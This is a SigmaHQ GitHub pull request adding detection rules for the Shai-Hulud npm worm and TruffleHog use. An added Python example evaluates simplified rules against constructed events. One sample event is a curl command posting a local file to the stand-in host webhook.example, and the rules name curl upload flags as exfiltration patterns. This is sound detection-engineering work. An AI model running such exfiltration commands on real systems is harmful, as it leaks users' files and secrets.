
feat: shai hulud worm targeting npm supply chain attack #5658

Merged
swachchhanda000 merged 8 commits into SigmaHQ:master from swachchhanda000:shai_hulud_npm_worm
Oct 19, 2025

Conversation

@swachchhanda000 (Collaborator) commented Sep 24, 2025

Summary of the Pull Request

Changelog

new - Shai-Hulud Malicious GitHub Workflow Creation
new - Shai-Hulud NPM Attack GitHub Activity
new - Shai-Hulud NPM Package Malicious Exfiltration via Curl
new - PUA - TruffleHog Execution
new - PUA - TruffleHog Execution - Linux

Example Log Event

Fixed Issues


@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules Emerging-Threats labels Sep 24, 2025
Copilot AI (Contributor) left a comment

Pull Request Overview

Adds new Sigma rules to detect Shai-Hulud NPM supply chain attack behaviors (malicious workflow creation, GitHub activity, data exfiltration) and potentially unwanted TruffleHog executions on Windows and Linux.

  • Introduces TruffleHog PUA process creation detection for Windows and Linux.
  • Adds emerging threat rules for Shai-Hulud malicious workflow file creation, GitHub audit activity, and curl-based exfiltration.
  • Provides campaign-focused tagging and references for emerging threat context.

Reviewed Changes

Copilot reviewed 5 out of 5 changed files in this pull request and generated 11 comments.

Reviewed files:

  • rules/windows/process_creation/proc_creation_win_pua_trufflehog.yml: New Windows TruffleHog execution detection rule.
  • rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml: New Linux TruffleHog execution detection rule.
  • rules-emerging-threats/2025/Malware/Shai-Hulud/proc_creation_lnx_mal_shai_hululd_exfiltration.yml: Curl-based exfiltration detection for Shai-Hulud on Linux.
  • rules-emerging-threats/2025/Malware/Shai-Hulud/github_mal_shai_hulud_npm_attack.yml: GitHub audit rule for malicious workflow activity.
  • rules-emerging-threats/2025/Malware/Shai-Hulud/file_event_lnx_mal_shai_hulud_workflow.yml: Detects creation of malicious workflow file on filesystem.

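To show how process_creation and file_event rules of the kind listed in this PR are evaluated against telemetry, here is a minimal Sigma-style matcher run over a handful of constructed Linux events. This is an added example, not code from this PR or the SigmaHQ repository. The three rules are simplified, illustrative approximations of the detection ideas the PR names (TruffleHog execution, curl-based exfiltration, workflow file creation); the field values, the curl upload flags, the localhost filter and the git/editor filter are assumptions made for the demo, not the logic of the merged YAML files, which should be read directly.

```python
"""Minimal Sigma-style rule evaluator (added example, not the SigmaHQ rules).

Implements the subset of Sigma semantics needed here: case-insensitive
field matching, the contains/startswith/endswith/all modifiers, list values
as OR (or AND with |all), and conditions built from selection names with
and / or / not. Rules and events are constructed for illustration only.
"""


def _field_match(value, pattern, modifiers):
    """Match one field value against one pattern under Sigma modifiers."""
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()  # Sigma matching is case-insensitive
    if "contains" in modifiers:
        return p in v
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    return v == p


def _selection_match(event, selection):
    """All keys of a selection must match (AND); list values are OR unless |all."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        values = patterns if isinstance(patterns, list) else [patterns]
        hits = [_field_match(event.get(field), pat, mods) for pat in values]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True


def _eval_condition(cond, results):
    """Evaluate 'a and not b or c' style conditions without eval(): OR of AND-clauses."""
    def term(tok):
        tok = tok.strip()
        if tok.startswith("not "):
            return not results[tok[4:].strip()]
        return results[tok]
    return any(all(term(t) for t in clause.split(" and ")) for clause in cond.split(" or "))


def evaluate(rule, event):
    """Return True if the event's logsource matches and the rule condition holds."""
    ls = rule["logsource"]
    if event.get("category") != ls["category"] or event.get("product") != ls["product"]:
        return False
    det = rule["detection"]
    results = {name: _selection_match(event, sel) for name, sel in det.items() if name != "condition"}
    return _eval_condition(det["condition"], results)


# Illustrative rules (assumed field values; NOT the PR's YAML logic).
RULES = [
    {
        "title": "PUA - TruffleHog Execution - Linux (illustrative)",
        "logsource": {"category": "process_creation", "product": "linux"},
        "detection": {"selection": {"Image|endswith": "/trufflehog"}, "condition": "selection"},
    },
    {
        "title": "Curl-based exfiltration (illustrative)",
        "logsource": {"category": "process_creation", "product": "linux"},
        "detection": {
            "selection_img": {"Image|endswith": "/curl"},
            # assumed upload flags: curl reading a local file into the request body
            "selection_upload": {"CommandLine|contains": ["-d @", "--data @", "--data-binary @", "-T ", "--upload-file"]},
            "filter_local": {"CommandLine|contains": ["localhost", "127.0.0.1"]},  # assumed benign filter
            "condition": "selection_img and selection_upload and not filter_local",
        },
    },
    {
        "title": "GitHub workflow file written by non-git process (illustrative)",
        "logsource": {"category": "file_event", "product": "linux"},
        "detection": {
            "selection": {"TargetFilename|contains": "/.github/workflows/", "TargetFilename|endswith": [".yml", ".yaml"]},
            "filter_git": {"Image|endswith": ["/git", "/code"]},  # assumed benign writers
            "condition": "selection and not filter_git",
        },
    },
]

# Constructed sample events in a Sysmon-for-Linux-like shape (not real telemetry).
EVENTS = [
    {"category": "process_creation", "product": "linux", "Image": "/usr/local/bin/trufflehog",
     "CommandLine": "trufflehog filesystem /home/dev --json"},
    {"category": "process_creation", "product": "linux", "Image": "/usr/bin/curl",
     "CommandLine": "curl -s -X POST -d @/tmp/out.json https://webhook.example/collect"},
    {"category": "process_creation", "product": "linux", "Image": "/usr/bin/curl",
     "CommandLine": "curl -d @payload.json http://localhost:8080/api"},
    {"category": "file_event", "product": "linux", "Image": "/usr/bin/node",
     "TargetFilename": "/home/dev/repo/.github/workflows/ci.yml"},
    {"category": "file_event", "product": "linux", "Image": "/usr/bin/git",
     "TargetFilename": "/home/dev/repo/.github/workflows/ci.yml"},
]


def run(rules=RULES, events=EVENTS):
    """Return (event index, rule title) for every rule that fires on every event."""
    return [(i, r["title"]) for i, ev in enumerate(events) for r in rules if evaluate(r, ev)]


if __name__ == "__main__":
    for idx, title in run():
        print(f"event {idx}: {title}")
```

Events 0, 1 and 3 fire; event 2 is suppressed by the localhost filter and event 4 by the git filter, which is the shape of tuning a practitioner will need when deploying the real rules against developer workstations and CI runners, where curl uploads and workflow edits are routine.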

@swachchhanda000 swachchhanda000 merged commit 208fee5 into SigmaHQ:master Oct 19, 2025
13 checks passed
swachchhanda000 added a commit to montysecurity/sigma that referenced this pull request Nov 19, 2025
…argeting npm supply chain attack

new - Shai-Hulud Malicious GitHub Workflow Creation
new - Shai-Hulud NPM Attack GitHub Activity
new - Shai-Hulud NPM Package Malicious Exfiltration via Curl
new - PUA - TruffleHog Execution
new - PUA - TruffleHog Execution - Linux

Labels

Emerging-Threats Ready to Merge Rules Windows Pull request add/update windows related rules


4 participants